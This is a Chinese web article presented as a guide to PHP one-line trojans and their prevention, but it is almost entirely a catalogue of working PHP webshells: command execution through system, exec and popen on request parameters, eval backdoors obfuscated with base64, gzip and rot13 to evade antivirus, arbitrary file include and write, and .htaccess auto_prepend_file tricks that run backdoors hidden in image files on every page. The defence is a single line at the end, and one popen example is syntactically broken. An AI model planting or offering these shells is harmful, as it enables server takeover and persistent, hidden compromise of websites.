PHP木马大全 一句话的PHP木马的防范

所属分类: 网络安全 / 脚本攻防 阅读数: 190
收藏 0 赞 0 分享
php后门木马常用的函数大致上可分为四种类型:

  1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open

  2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

  3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

  4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

  1. 执行系统命令:

  system 函数

  //test.php?cmd=ls

  system($_GET[cmd]);

  passthru 函数

  //test.php?cmd=ls

  passthru($_GET[cmd]);

  shell_exec 函数

  //test.php?cmd=ls

  echo shell_exec($_GET[cmd]);

  exec 函数

  //test.php?cmd=ls

  $arr = array();

  exec($_GET[cmd],$arr);

  print_r($arr);

  popen 函数

  //test.php?cmd=ls

  $handle = popen('$_GET[cmd], 'r');

  $read = fread($handle, 2096);

  echo $read;

  pclose($handle);

  proc_open 函数

  //test.php?cmd=ls

  $descriptorspec = array(

  0 => array('pipe', 'r'),

  1 => array('pipe', 'w'),

  2 => array('pipe', 'w'),

  );

  $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);

  fclose($pipes[0]);

  $output = array();

  while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));

  print_r($output);

  2. 代码执行与加密:

  eval 函数

  //最常见的一句话木马

  eval($_POST[cmd]);

  base64_decode 函数

  //为了免杀及隐藏而加密代码

  //密文: eval($_POST['cmd']);

  eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

  gzinflate 函数

  //为了免杀及隐藏而加密代码

  //密文: eval($_POST['cmd']);

  eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));

  gzuncompress 函数

  //为了免杀及隐藏而加密代码

  //密文: eval($_POST['cmd']);

  eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

  gzdecode 函数

  //为了免杀及隐藏而加密代码

  //密文: eval($_POST['cmd']);

  eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));

  str_rot13 函数

  //为了免杀及隐藏而加密代码

  //密文: eval($_POST[cmd]);

  eval(str_rot13('riny($_CBFG[pzq]);'));

  assert 函数

  //类似eval函数

  assert($_POST[cmd]);

  call_user_func 函数

  //使用call_user_func调用assert

  call_user_func('assert',$_POST[cmd]);

  call_user_func 函数

  //使用call_user_func调用任意函数

  //test.php?a=assert&cmd=phpinfo()

  call_user_func($_GET[a],$_REQUEST[cmd]);

  组合代码

  //组合方式调用任意函数

  //test.php?a=assert&cmd=phpinfo()

  $_GET[a]($_REQUEST[cmd]);

  3. 文件包含与生成:

  require 函数

  //包含任意文件

  //test.php?file=123.jpg

  require($_GET[file]);

  require_once 函数

  //包含任意文件

  //test.php?file=123.jpg

  require_once($_GET[file]);

  include 函数

  //包含任意文件 www.jb51.net

  //test.php?file=123.jpg

  include($_GET[file]);

  include_once 函数

  //包含任意文件

  //test.php?file=123.jpg

  include_once($_GET[file]);

  file_get_contents 函数

  //读取任意文件

  //test.php?f=config.inc.php

  echo file_get_contents($_GET['f']);

  file_put_contents 函数

  //生成任意内容文件

  //a=test.php&b=

  file_put_contents($_GET[a],$_GET[b]);

  fputs 函数

  //生成任意内容文件

  //a=test.php&b=

  fputs(fopen($_GET[a],"w"),$_GET[b]);

  4. .htaccess:

  SetHandler

  //可将php代码存于非php后缀文件,例: x.jpg

  //将以下代码写入.htaccess中

  //连接x.jpg即可启动后门木马出处www.admin8.us

  

  SetHandler application/x-httpd-php

  

  auto_prepend_file

  //可将php代码存于非php后缀文件,例: 123.gif

  //将以下代码写入.htaccess中, 文件路径必须是绝对路径

  //访问网站上任何php文件都会启动该php后门木马

  //可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马

  php_value auto_prepend_file c:/apache2/htdocs/123.gif

  auto_append_file

  //类似auto_prepend_file

  //可将php代码存于非php后缀文件,例: 123.gif

  //将以下代码写入.htaccess中, 文件路径必须是绝对路径

  //访问网站上任何php文件都会启动该php后门木马

  php_value auto_append_file c:/apache2/htdocs/123.gif

防范方法:通过禁止危险函数 php.ini中设置disable_functions详情可以参考下 https://www.jb51.net/article/19292.htm
更多精彩内容其他人还在看

web后门 那些强悍猥琐流的PHP一句话后门大全分享

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦
收藏 0 赞 0 分享

PHP脚本木马的高级防范经验

这篇文章介绍了从服务器设置php的一些安全问题,主要是通过屏蔽一些容易被黑客利用的函数,实现网站安全的最大化
收藏 0 赞 0 分享

PHP的一个EVAL的利用防范

这篇文章主要为大家介绍下php eval的利用防范,为了安装强烈兼用少用eval函数
收藏 0 赞 0 分享

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日
收藏 0 赞 0 分享

一些常见的PHP后门原理分析

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果
收藏 0 赞 0 分享

Mysql语法绕过360scan insert防注入方法

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =方法
收藏 0 赞 0 分享

科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

会员上传文件漏洞,可以上传任意后缀,实现任意文件上传WEBSHELL
收藏 0 赞 0 分享

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP多字节编码漏洞小结

这篇文章主要介绍了PHP多字节编码漏洞小结,需要的朋友可以参考下
收藏 0 赞 0 分享

防范 dedecms 广告内容插入后门

这篇文章主要介绍了防范 dedecms 广告内容插入后门,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多